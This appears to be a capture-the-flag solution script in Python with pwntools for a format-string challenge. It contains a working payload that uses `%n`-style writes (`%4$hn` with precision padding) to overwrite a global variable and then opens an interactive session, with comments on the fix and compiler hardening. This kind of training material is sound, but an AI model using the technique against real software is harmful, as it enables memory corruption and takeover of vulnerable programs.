Codefest CTF: Format Strings [#pwn]
#!/usr/bin/env python3
'''
0x080492df <+52>: push 0x50
0x080492e1 <+54>: lea eax,[ebp-0x58]
0x080492e4 <+57>: push eax
0x0804930d <+98>: call 0x80490a0 <printf@plt>
0x08049312 <+103>: add esp,0x10
0x08049315 <+106>: mov eax,DWORD PTR [ebx+0x44] # 0x804c044 <position>: 0x00000000
0x0804931b <+112>: cmp eax,0xcafe
0x08049320 <+117>: jne 0x8049339 <vuln+142>
'''
from pwn import *
import time
# Target: the `vuln` routine in the disassembly above passes a stack buffer
# (lea eax,[ebp-0x58]; push eax) straight to printf as the FORMAT argument, so
# whoever fills that buffer controls the conversion specifiers, including the
# `%n` family that writes the running character count to memory.  After the
# call, `position` (0x804c044) must equal 0xcafe to take the non-jne path.
# Root-cause fix on the defending side is a constant format, printf("%s", buf),
# and building with -Wformat -Werror=format-security (FORTIFY_SOURCE also
# rejects %n in writable format strings); RELRO/PIE would further blunt this.

# Little-endian 32-bit addresses of the two halves of `position`; both are
# placed at the front of the payload so they sit at a fixed argument slot.
addr_low: bytes = p32(0x804c044)
addr_high: bytes = p32(0x804c046)
payload: bytes = b""
payload += addr_low
payload += addr_high
# `%.Nx` with precision N = 0xcafe - 8: the 8 address bytes already printed
# plus N digits bring printf's output count to exactly 0xcafe.
payload += (f"%.{0xcafe - 8}x").encode()
# Local binary for testing; the commented-out line is the contest endpoint.
r = process("./format")
# r = remote("chall.codefest.tech", 8744)
# `%4$hn`: positional parameter 4 with a short-width `%n`, i.e. store the
# 16-bit character count there.  Assumes slot 4 is where `addr_low` lands on
# this binary's stack — offset is binary-specific; verify against the target.
write_high: bytes = (f"%{4}$hn").encode()
p: bytes = payload + write_high
# Sync on the prompt; a str pattern is accepted (pwntools encodes it), though
# b"I will go" would be the explicit Python 3 form.  Rest of that line is discarded.
data = r.recvuntil("I will go")
r.readline()
log.info("Sending payload...")
r.sendline(p)
# First line after sending (the echoed format output) is skipped; the second
# is expected to end with the value now stored at `position`.
data = r.readline()
data = r.readline()
addr: str = data.decode().split(" ")[-1]
log.info(f"Memory address now contains: {addr}")
# Next line is printed with errors='ignore' — presumably it can contain
# non-UTF-8 bytes from the padded printf output; confirm against the binary.
data = r.readline()
print("\t", data.decode('utf-8', errors='ignore'))
# Hand the session to the user.
r.interactive()